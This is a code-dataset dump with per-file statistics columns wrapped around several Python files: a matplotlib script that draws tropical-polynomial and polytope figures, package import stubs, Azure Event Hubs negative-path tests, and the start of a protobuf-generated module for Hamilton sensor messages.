| 0.659898
| 0.517767
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0.088608
| 237
| 7
| 44
| 33.857143
| 0.884259
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1a7019302b22815a48cb68855f848e13fe42b6fb
| 9,139
|
py
|
Python
|
create_figures.py
|
GeorgiosSmyrnis/multiclass_minimization_icml2020
|
3da0ea15ee94c74948631f22d527f52040294779
|
[
"MIT"
] | 2
|
2021-05-11T05:31:52.000Z
|
2022-03-18T22:24:45.000Z
|
create_figures.py
|
GeorgiosSmyrnis/multiclass_minimization_icml2020
|
3da0ea15ee94c74948631f22d527f52040294779
|
[
"MIT"
] | 1
|
2021-05-24T12:44:57.000Z
|
2021-05-24T12:44:57.000Z
|
create_figures.py
|
GeorgiosSmyrnis/multiclass_minimization_icml2020
|
3da0ea15ee94c74948631f22d527f52040294779
|
[
"MIT"
] | 1
|
2020-11-27T11:33:59.000Z
|
2020-11-27T11:33:59.000Z
|
#!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits import mplot3d
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
from scipy.spatial import ConvexHull
# Define parameters for Type 1 fonts
fsize = (3, 3)
plt.rcParams.update({
    'ps.useafm': True,
    'pdf.use14corefonts': True,
    'text.usetex': True,
})
# Figure 1a, division of max(3x+1.5, 2x+1.3, x+0.75, 0) by max(x-0.5, 0).
plt.figure(figsize=fsize, dpi=300)
axes = plt.axes()
axes.plot([0, 1, 2, 3], [0, 0.75, 1.3, 1.5], 'b.-', label='ENewt(p(x))')
axes.set_ylim(-1.25, 2.25)
axes.set_xlabel('Tropical Degree')
axes.set_ylabel('Tropical Coefficient')
axes.plot([1, 2], [0.25, -0.75], 'rx-', label='ENewt(d(x))')
# Green arrows mark the upward shift applied at the divisor's vertices.
arrow_kw = dict(width=0.01, color='g', linestyle='-')
axes.arrow(1, 0.25, 0, 0.3, **arrow_kw)
axes.arrow(2, -0.75, 0, 0.3, **arrow_kw)
axes.grid(True, alpha=0.5)
axes.legend()
plt.tight_layout()
# Figure 1b, result (quotient + divisor) is max(3x+0.3, 2x+1.3, x+0.75, 0)
plt.figure(figsize=fsize, dpi=300)
axes = plt.axes()
axes.set_xlabel('Tropical Degree')
axes.set_ylabel('Tropical Coefficient')
axes.plot([0, 1, 2, 3], [0, 0.75, 1.3, 0.3], 'g.-', label='ENewt(q(x)+d(x))')
axes.set_ylim(-1.25, 2.25)
axes.grid(True, alpha=0.5)
axes.legend()
plt.tight_layout()
# Figure 2a, polytope of example network provided in paper, Section 4.1
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0, 3.5])
ax.set_ylim([0, 3.5])
ax.set_zlim([0, 4.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
# Create the faces of the polytope: (x, y, z) vertex lists, one tuple per face.
polytope_faces = [
    ([0, 1, 1, 0], [0, 0, 1, 1], [0, 1, 2, 1]),
    ([1, 1, 2, 2], [0, 1, 2, 1], [1, 2, 3, 2]),
    ([0, 1, 2, 1], [1, 1, 2, 2], [1, 2, 3, 2]),
]
for fx, fy, fz in polytope_faces:
    face = Poly3DCollection([list(zip(fx, fy, fz))], zorder=1)
    face.set_edgecolor('black')
    face.set_facecolor('yellow')
    ax.add_collection3d(face)
# Mark the vertex of interest on top of the faces.
ax.plot3D([2], [1], [2], 'bo', zorder=2, label='Vertex 101')
ax.legend(loc='upper left')
# Figure 2b, the other network from the same example as before.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0, 3.5])
ax.set_ylim([0, 3.5])
ax.set_zlim([0, 4.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
# Faces of the second network's polytope: (x, y, z) vertex lists per face.
polytope_faces = [
    ([0, 2, 2, 0], [0, 0, 1, 1], [0, 2, 3, 1]),
    ([2, 2, 3, 3], [0, 1, 2, 1], [2, 3, 4, 3]),
    ([0, 2, 3, 1], [1, 1, 2, 2], [1, 3, 4, 2]),
]
for fx, fy, fz in polytope_faces:
    face = Poly3DCollection([list(zip(fx, fy, fz))])
    face.set_edgecolor('black')
    face.set_facecolor('red')
    ax.add_collection3d(face)
# Mark the vertex of interest.
ax.plot3D([3], [1], [3], 'bo', label='Vertex 101')
ax.legend(loc='upper left')
# Figure 3a, polytope of network with three neurons, example from Section 4.3
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0, 2.5])
ax.set_ylim([0, 2.5])
ax.set_zlim([0, 3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
# Upper faces of the full three-neuron polytope.
polytope_faces = [
    ([0, 1, 1, 0], [0, 0, 1, 1], [0, 1, 2, 1]),
    ([1, 1, 2, 2], [0, 1, 2, 1], [1, 2, 3, 2]),
    ([0, 1, 2, 1], [1, 1, 2, 2], [1, 2, 3, 2]),
]
for fx, fy, fz in polytope_faces:
    face = Poly3DCollection([list(zip(fx, fy, fz))])
    face.set_edgecolor('black')
    face.set_facecolor('yellow')
    ax.add_collection3d(face)
# Highlight the vertices that the approximation keeps.
ax.plot3D([0, 0, 2, 2], [0, 1, 2, 1], [0, 1, 3, 2], 'bo', label='Vertices Kept')
ax.legend()
# Figure 3b, approximation of the previous polytope with a network with fewer
# neurons.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0, 2.5])
ax.set_ylim([0, 2.5])
ax.set_zlim([0, 3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
# Single face through the four kept vertices.
vx, vy, vz = [0, 0, 2, 2], [0, 1, 2, 1], [0, 1, 3, 2]
face = Poly3DCollection([list(zip(vx, vy, vz))])
face.set_edgecolor('black')
face.set_facecolor('red')
ax.add_collection3d(face)
ax.plot3D(vx, vy, vz, 'bo', label='Vertices Kept')
ax.legend()
# Figure 4a, original network polytope of example.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0, 5.5])
ax.set_ylim([0, 5.5])
ax.set_zlim([0, 3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
ws = np.array([[1, 2, 1], [2, 1, 1], [2, 0, 0], [0, 2, 0]])
# Collect the origin plus every nonempty subset sum of the rows of ws; the
# bitmask enumeration reproduces the original nested-loop order (first row =
# most significant bit, last row = least).
w_all = [np.zeros((1, 3))]
for mask in range(1, 16):
    picked = [ws[[j], :] for j in range(4) if (mask >> (3 - j)) & 1]
    w_all.append(sum(picked))
w_all.append(np.array([[2, 2, 5]]))
w_all = np.concatenate(w_all, axis=0)
# Qhull 'QG16': facets are flagged relative to the last point (index 16, the
# apex appended above); hull.good selects those facets.
hull = ConvexHull(w_all, qhull_options='QG16')
f = hull.simplices[hull.good]
for i in range(len(f)):
    # Start each polygon at the third simplex vertex so it closes on itself.
    x = [w_all[f[i, 2], 0]]
    y = [w_all[f[i, 2], 1]]
    z = [w_all[f[i, 2], 2]]
    for j in range(3):
        w = w_all[f[i, j]]
        x.append(w[0])
        y.append(w[1])
        z.append(w[2])
    poly = Poly3DCollection([list(zip(x, y, z))])
    poly.set_edgecolor('black')
    poly.set_facecolor('blue')
    ax.add_collection3d(poly)
# Figure 4b, polytope approximated via heuristic algorithm.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([-2.5, 5.5])
ax.set_ylim([-2.5, 5.5])
ax.set_zlim([0, 3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
ws = np.array([[5, 5, 2], [0, -2, 0], [-2, 0, 0]])
# Origin plus every nonempty subset sum of the rows of ws, in the original
# nested-loop order (first row = most significant bit).
w_all = [np.zeros((1, 3))]
for mask in range(1, 8):
    picked = [ws[[j], :] for j in range(3) if (mask >> (2 - j)) & 1]
    w_all.append(sum(picked))
w_all.append(np.array([[0, 0, 5]]))
w_all = np.concatenate(w_all, axis=0)
# Qhull 'QG8': facets flagged relative to the appended apex (index 8).
hull = ConvexHull(w_all, qhull_options='QG8')
f = hull.simplices[hull.good]
for i in range(len(f)):
    # Start each polygon at the third simplex vertex so it closes on itself.
    x = [w_all[f[i, 2], 0]]
    y = [w_all[f[i, 2], 1]]
    z = [w_all[f[i, 2], 2]]
    for j in range(3):
        w = w_all[f[i, j]]
        x.append(w[0])
        y.append(w[1])
        z.append(w[2])
    poly = Poly3DCollection([list(zip(x, y, z))])
    poly.set_edgecolor('black')
    poly.set_facecolor('red')
    ax.add_collection3d(poly)
# Figure 4c, polytope approximated with stable algorithm.
fig = plt.figure(figsize=fsize, dpi=300)
ax = plt.axes(projection='3d')
ax.view_init(azim=-100)
ax.set_xlim([0, 5.5])
ax.set_ylim([0, 5.5])
ax.set_zlim([0, 3.5])
ax.set_xlabel('Tropical Degree 1')
ax.set_ylabel('Tropical Degree 2')
ax.set_zlabel('Coefficient')
ws = np.array([[0, 2, 0], [2, 0, 0], [3, 3, 2]])
# Origin plus every nonempty subset sum of the rows of ws, in the original
# nested-loop order (first row = most significant bit).
w_all = [np.zeros((1, 3))]
for mask in range(1, 8):
    picked = [ws[[j], :] for j in range(3) if (mask >> (2 - j)) & 1]
    w_all.append(sum(picked))
w_all.append(np.array([[0, 0, 5]]))
w_all = np.concatenate(w_all, axis=0)
# Qhull 'QG8': facets flagged relative to the appended apex (index 8).
hull = ConvexHull(w_all, qhull_options='QG8')
f = hull.simplices[hull.good]
for i in range(len(f)):
    # Start each polygon at the third simplex vertex so it closes on itself.
    x = [w_all[f[i, 2], 0]]
    y = [w_all[f[i, 2], 1]]
    z = [w_all[f[i, 2], 2]]
    for j in range(3):
        w = w_all[f[i, j]]
        x.append(w[0])
        y.append(w[1])
        z.append(w[2])
    poly = Poly3DCollection([list(zip(x, y, z))])
    poly.set_edgecolor('black')
    poly.set_facecolor('yellow')
    ax.add_collection3d(poly)
# Output all of the above figures.
plt.show()
| 28.294118
| 78
| 0.580808
| 1,619
| 9,139
| 3.18777
| 0.11365
| 0.046503
| 0.024414
| 0.06801
| 0.832784
| 0.822903
| 0.815733
| 0.809339
| 0.806239
| 0.784538
| 0
| 0.079531
| 0.215779
| 9,139
| 322
| 79
| 28.381988
| 0.640575
| 0.079002
| 0
| 0.870849
| 0
| 0
| 0.092315
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.01845
| 0
| 0.01845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ac436aa40eb6b64f960b62f517af827e75d2cad
| 273
|
py
|
Python
|
centermask/data/__init__.py
|
LoSealL/centermask2
|
397285ab186cf364462b97b04dcb534a429724ef
|
[
"Apache-2.0"
] | null | null | null |
centermask/data/__init__.py
|
LoSealL/centermask2
|
397285ab186cf364462b97b04dcb534a429724ef
|
[
"Apache-2.0"
] | null | null | null |
centermask/data/__init__.py
|
LoSealL/centermask2
|
397285ab186cf364462b97b04dcb534a429724ef
|
[
"Apache-2.0"
] | null | null | null |
from .data_loader_x import build_x_test_loader, build_x_train_loader
from .datasets.atr import register_atr_instance
from .datasets.cihp import register_cihp_instance
from .datasets.mhp_v1 import register_mhpv1_instance
from .datasets.mhp_v2 import register_mhpv2_instance
| 45.5
| 68
| 0.886447
| 43
| 273
| 5.209302
| 0.418605
| 0.214286
| 0.267857
| 0.205357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015873
| 0.076923
| 273
| 5
| 69
| 54.6
| 0.873016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1acb8a3c6af778357e8a0e5ab2d83b1944cc27fe
| 7,954
|
py
|
Python
|
tests/test_negative.py
|
torosent/azure-event-hubs-python
|
fed848c276656992be63ea26f5e4146e5aacca22
|
[
"MIT"
] | null | null | null |
tests/test_negative.py
|
torosent/azure-event-hubs-python
|
fed848c276656992be63ea26f5e4146e5aacca22
|
[
"MIT"
] | null | null | null |
tests/test_negative.py
|
torosent/azure-event-hubs-python
|
fed848c276656992be63ea26f5e4146e5aacca22
|
[
"MIT"
] | null | null | null |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import os
import asyncio
import pytest
from azure import eventhub
from azure.eventhub import EventData, Offset, EventHubError, EventHubClient
from azure.eventhub.async import EventHubClientAsync
def test_send_partition_key_with_partition(connection_str):
    """Sending an event that carries a partition_key through a sender bound to a
    specific partition must raise ValueError.
    """
    client = EventHubClient.from_connection_string(connection_str, debug=False)
    sender = client.add_sender(partition="1")
    try:
        client.run()
        data = EventData(b"Data")
        data.partition_key = b"PKey"
        with pytest.raises(ValueError):
            sender.send(data)
    finally:
        # Always tear the client down, even when the assertion fails.
        client.stop()
@pytest.mark.asyncio
async def test_send_partition_key_with_partition_async(connection_str):
    """Async variant: a partition-bound sender must raise ValueError for an
    event that also carries a partition_key.
    """
    client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
    sender = client.add_async_sender(partition="1")
    try:
        await client.run_async()
        data = EventData(b"Data")
        data.partition_key = b"PKey"
        with pytest.raises(ValueError):
            await sender.send(data)
    finally:
        # Always tear the client down, even when the assertion fails.
        await client.stop_async()
def test_non_existing_entity_sender(connection_str):
    """Sending to a nonexistent Event Hub ("nemo") must raise EventHubError."""
    client = EventHubClient.from_connection_string(connection_str, eventhub="nemo", debug=False)
    sender = client.add_sender(partition="1")
    try:
        client.run()
        data = EventData(b"Data")
        with pytest.raises(EventHubError):
            sender.send(data)
    finally:
        # Always tear the client down, even when the assertion fails.
        client.stop()
@pytest.mark.asyncio
async def test_non_existing_entity_sender_async(connection_str):
    """Async variant: sending to a nonexistent Event Hub must raise EventHubError."""
    client = EventHubClientAsync.from_connection_string(connection_str, eventhub="nemo", debug=False)
    sender = client.add_async_sender(partition="1")
    try:
        await client.run_async()
        data = EventData(b"Data")
        with pytest.raises(EventHubError):
            await sender.send(data)
    finally:
        # Always tear the client down, even when the assertion fails.
        await client.stop_async()
def test_non_existing_entity_receiver(connection_str):
    """Receiving from a nonexistent Event Hub ("nemo") must raise EventHubError."""
    client = EventHubClient.from_connection_string(connection_str, eventhub="nemo", debug=False)
    receiver = client.add_receiver("$default", "0")
    try:
        client.run()
        with pytest.raises(EventHubError):
            receiver.receive(timeout=5)
    finally:
        # Always tear the client down, even when the assertion fails.
        client.stop()
@pytest.mark.asyncio
async def test_non_existing_entity_receiver_async(connection_str):
    """Async variant: receiving from a nonexistent Event Hub must raise EventHubError."""
    client = EventHubClientAsync.from_connection_string(connection_str, eventhub="nemo", debug=False)
    receiver = client.add_async_receiver("$default", "0")
    try:
        await client.run_async()
        with pytest.raises(EventHubError):
            await receiver.receive(timeout=5)
    finally:
        # Always tear the client down, even when the assertion fails.
        await client.stop_async()
def test_receive_from_invalid_partitions(connection_str):
    """Receiving from each syntactically invalid partition id must raise EventHubError."""
    partitions = ["XYZ", "-1", "1000", "-"]
    for p in partitions:
        client = EventHubClient.from_connection_string(connection_str, debug=False)
        receiver = client.add_receiver("$default", p)
        try:
            client.run()
            with pytest.raises(EventHubError):
                receiver.receive(timeout=5)
        finally:
            # Stop each per-partition client before trying the next id.
            client.stop()
@pytest.mark.asyncio
async def test_receive_from_invalid_partitions_async(connection_str):
    """Async variant: each invalid partition id must raise EventHubError on receive."""
    partitions = ["XYZ", "-1", "1000", "-"]
    for p in partitions:
        client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
        receiver = client.add_async_receiver("$default", p)
        try:
            await client.run_async()
            with pytest.raises(EventHubError):
                await receiver.receive(timeout=5)
        finally:
            # Stop each per-partition client before trying the next id.
            await client.stop_async()
def test_send_to_invalid_partitions(connection_str):
    """Sending to each syntactically invalid partition id must raise EventHubError."""
    partitions = ["XYZ", "-1", "1000", "-"]
    for p in partitions:
        client = EventHubClient.from_connection_string(connection_str, debug=False)
        sender = client.add_sender(partition=p)
        try:
            client.run()
            data = EventData(b"Data")
            with pytest.raises(EventHubError):
                sender.send(data)
        finally:
            # Stop each per-partition client before trying the next id.
            client.stop()
@pytest.mark.asyncio
async def test_send_to_invalid_partitions_async(connection_str):
    """Async variant: each invalid partition id must raise EventHubError on send."""
    partitions = ["XYZ", "-1", "1000", "-"]
    for p in partitions:
        client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
        sender = client.add_async_sender(partition=p)
        try:
            await client.run_async()
            data = EventData(b"Data")
            with pytest.raises(EventHubError):
                await sender.send(data)
        finally:
            # Stop each per-partition client before trying the next id.
            await client.stop_async()
def test_send_too_large_message(connection_str):
    """Sending a 300 kB event body must raise EventHubError.

    (The unused copy-pasted `partitions` list from the neighboring tests has
    been removed — this test does not iterate partitions.)
    """
    client = EventHubClient.from_connection_string(connection_str, debug=False)
    sender = client.add_sender()
    try:
        client.run()
        data = EventData(b"A" * 300000)
        with pytest.raises(EventHubError):
            sender.send(data)
    finally:
        # Always tear the client down, even when the assertion fails.
        client.stop()
@pytest.mark.asyncio
async def test_send_too_large_message_async(connection_str):
    """Async variant: a 300 kB event body must raise EventHubError.

    (The unused copy-pasted `partitions` list has been removed.)
    """
    client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
    sender = client.add_async_sender()
    try:
        await client.run_async()
        data = EventData(b"A" * 300000)
        with pytest.raises(EventHubError):
            await sender.send(data)
    finally:
        # Always tear the client down, even when the assertion fails.
        await client.stop_async()
def test_send_null_body(connection_str):
    """Constructing/sending an event with a None body must raise ValueError.

    (The unused copy-pasted `partitions` list has been removed.)
    """
    client = EventHubClient.from_connection_string(connection_str, debug=False)
    sender = client.add_sender()
    try:
        client.run()
        with pytest.raises(ValueError):
            data = EventData(None)
            sender.send(data)
    finally:
        # Always tear the client down, even when the assertion fails.
        client.stop()
@pytest.mark.asyncio
async def test_send_null_body_async(connection_str):
    """Async variant: an event with a None body must raise ValueError.

    (The unused copy-pasted `partitions` list has been removed.)
    """
    client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
    sender = client.add_async_sender()
    try:
        await client.run_async()
        with pytest.raises(ValueError):
            data = EventData(None)
            await sender.send(data)
    finally:
        # Always tear the client down, even when the assertion fails.
        await client.stop_async()
async def pump(receiver):
    """Drain *receiver* until an empty/falsy batch arrives; return the total
    number of messages received (each call uses a 10-second receive timeout).
    """
    total = 0
    while True:
        batch = await receiver.receive(timeout=10)
        if not batch:
            break
        total += len(batch)
    return total
@pytest.mark.asyncio
async def test_max_receivers_async(connection_str, senders):
    """Opening six concurrent receivers on one partition must make exactly one
    of them fail with EventHubError (the service caps concurrent receivers).
    """
    client = EventHubClientAsync.from_connection_string(connection_str, debug=False)
    receivers = [
        client.add_async_receiver("$default", "0", prefetch=1000, offset=Offset('@latest'))
        for _ in range(6)
    ]
    await client.run_async()
    try:
        # Pump every receiver concurrently; collect exceptions instead of raising.
        outputs = await asyncio.gather(*(pump(r) for r in receivers),
                                       return_exceptions=True)
        assert len([o for o in outputs if isinstance(o, EventHubError)]) == 1
    finally:
        # Always tear the client down, even when the assertion fails.
        await client.stop_async()
| 30.710425
| 109
| 0.634775
| 871
| 7,954
| 5.603904
| 0.12744
| 0.079902
| 0.061463
| 0.092194
| 0.863348
| 0.863348
| 0.833436
| 0.775456
| 0.763983
| 0.738783
| 0
| 0.013344
| 0.246291
| 7,954
| 259
| 110
| 30.710425
| 0.800834
| 0.037465
| 0
| 0.799087
| 0
| 0
| 0.024046
| 0
| 0
| 0
| 0
| 0
| 0.004566
| 0
| null | null | 0
| 0.027397
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2001532766c40fd23a544d9b328fb0656a3461df
| 196
|
py
|
Python
|
server/problem_sets/__init__.py
|
iiridescent/problem-sets
|
e906fe7509cd158ecdb5920853636339d4d531c3
|
[
"MIT"
] | null | null | null |
server/problem_sets/__init__.py
|
iiridescent/problem-sets
|
e906fe7509cd158ecdb5920853636339d4d531c3
|
[
"MIT"
] | 5
|
2021-03-09T10:36:59.000Z
|
2022-02-26T14:36:08.000Z
|
server/problem_sets/__init__.py
|
vinhowe/problem-sets
|
e906fe7509cd158ecdb5920853636339d4d531c3
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2019 Thomas Howe
from .api import *
from .environment import *
from .gen import *
from .gen.testbed import *
from .gen.util import *
from .problem import *
from .widget import *
| 19.6
| 33
| 0.719388
| 28
| 196
| 5.035714
| 0.5
| 0.425532
| 0.276596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025
| 0.183673
| 196
| 9
| 34
| 21.777778
| 0.85625
| 0.153061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
201899b0fccfc074a45bf3cad105de05d14e80d7
| 26,627
|
py
|
Python
|
python/pyxbos/pyxbos/hamilton_pb2.py
|
sguduguntla/xboswave
|
3a23a298354650dae9e086260fc1503d840d2f2a
|
[
"BSD-3-Clause"
] | 9
|
2019-02-08T01:35:14.000Z
|
2021-11-11T14:56:00.000Z
|
python/pyxbos/pyxbos/hamilton_pb2.py
|
sguduguntla/xboswave
|
3a23a298354650dae9e086260fc1503d840d2f2a
|
[
"BSD-3-Clause"
] | 26
|
2019-02-25T16:57:02.000Z
|
2019-08-05T20:44:52.000Z
|
python/pyxbos/pyxbos/hamilton_pb2.py
|
sguduguntla/xboswave
|
3a23a298354650dae9e086260fc1503d840d2f2a
|
[
"BSD-3-Clause"
] | 5
|
2019-02-05T20:04:40.000Z
|
2021-09-14T05:54:03.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: hamilton.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='hamilton.proto',
package='xbospb',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x0ehamilton.proto\x12\x06xbospb\"\\\n\x0cHamiltonData\x12\x0e\n\x06serial\x18\x01 \x01(\r\x12\r\n\x05model\x18\x02 \x01(\t\x12\x0c\n\x04time\x18\x03 \x01(\x04\x12\x1f\n\x03h3c\x18\x04 \x01(\x0b\x32\x12.xbospb.Hamilton3C\"\x95\x02\n\nHamilton3C\x12\x0e\n\x06uptime\x18\x01 \x01(\x04\x12\r\n\x05\x66lags\x18\x02 \x01(\r\x12\r\n\x05\x61\x63\x63_x\x18\x03 \x01(\x01\x12\r\n\x05\x61\x63\x63_y\x18\x04 \x01(\x01\x12\r\n\x05\x61\x63\x63_z\x18\x05 \x01(\x01\x12\r\n\x05mag_x\x18\x06 \x01(\x01\x12\r\n\x05mag_y\x18\x07 \x01(\x01\x12\r\n\x05mag_z\x18\x08 \x01(\x01\x12\x0f\n\x07tmp_die\x18\t \x01(\x01\x12\x13\n\x0btmp_voltage\x18\n \x01(\x01\x12\x10\n\x08\x61ir_temp\x18\x0b \x01(\x01\x12\x0f\n\x07\x61ir_hum\x18\x0c \x01(\x01\x12\x0e\n\x06\x61ir_rh\x18\r \x01(\x01\x12\x11\n\tlight_lux\x18\x0e \x01(\x01\x12\x0f\n\x07\x62uttons\x18\x0f \x01(\r\x12\x11\n\toccupancy\x18\x10 \x01(\x01\"\x96\x02\n\x0bHamilton330\x12\x0e\n\x06uptime\x18\x01 \x01(\x04\x12\r\n\x05\x66lags\x18\x02 \x01(\r\x12\r\n\x05\x61\x63\x63_x\x18\x03 \x01(\x01\x12\r\n\x05\x61\x63\x63_y\x18\x04 \x01(\x01\x12\r\n\x05\x61\x63\x63_z\x18\x05 \x01(\x01\x12\r\n\x05mag_x\x18\x06 \x01(\x01\x12\r\n\x05mag_y\x18\x07 \x01(\x01\x12\r\n\x05mag_z\x18\x08 \x01(\x01\x12\x0f\n\x07tmp_die\x18\t \x01(\x01\x12\x13\n\x0btmp_voltage\x18\n \x01(\x01\x12\x10\n\x08\x61ir_temp\x18\x0b \x01(\x01\x12\x0f\n\x07\x61ir_hum\x18\x0c \x01(\x01\x12\x0e\n\x06\x61ir_rh\x18\r \x01(\x01\x12\x11\n\tlight_lux\x18\x0e \x01(\x01\x12\x0f\n\x07\x62uttons\x18\x0f \x01(\r\x12\x11\n\toccupancy\x18\x10 \x01(\x01\"\x8c\x02\n\x13HamiltonBRLinkStats\x12\x11\n\tBadFrames\x18\x01 \x01(\x04\x12\x12\n\nLostFrames\x18\x02 \x01(\x04\x12\x18\n\x10\x44ropNotConnected\x18\x03 \x01(\x04\x12\x19\n\x11SumSerialReceived\x18\x04 \x01(\x04\x12\x1a\n\x12SumDomainForwarded\x18\x05 \x01(\x04\x12\x1b\n\x13SumDropNotConnected\x18\x06 \x01(\x04\x12\x19\n\x11SumDomainReceived\x18\x07 \x01(\x04\x12\x1a\n\x12SumSerialForwarded\x18\x08 \x01(\x04\x12\x13\n\x0bPublishOkay\x18\t 
\x01(\x04\x12\x14\n\x0cPublishError\x18\n \x01(\x04\"\x8e\x01\n\x11HamiltonBRMessage\x12\x0e\n\x06SrcMAC\x18\x01 \x01(\t\x12\r\n\x05SrcIP\x18\x02 \x01(\t\x12\r\n\x05PopID\x18\x03 \x01(\t\x12\x0f\n\x07PopTime\x18\x04 \x01(\x03\x12\x0e\n\x06\x42RTime\x18\x05 \x01(\x03\x12\x0c\n\x04RSSI\x18\x06 \x01(\x05\x12\x0b\n\x03LQI\x18\x07 \x01(\x05\x12\x0f\n\x07Payload\x18\x08 \x01(\x0c\x62\x06proto3')
)
_HAMILTONDATA = _descriptor.Descriptor(
name='HamiltonData',
full_name='xbospb.HamiltonData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='serial', full_name='xbospb.HamiltonData.serial', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='model', full_name='xbospb.HamiltonData.model', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='time', full_name='xbospb.HamiltonData.time', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='h3c', full_name='xbospb.HamiltonData.h3c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=26,
serialized_end=118,
)
_HAMILTON3C = _descriptor.Descriptor(
name='Hamilton3C',
full_name='xbospb.Hamilton3C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uptime', full_name='xbospb.Hamilton3C.uptime', index=0,
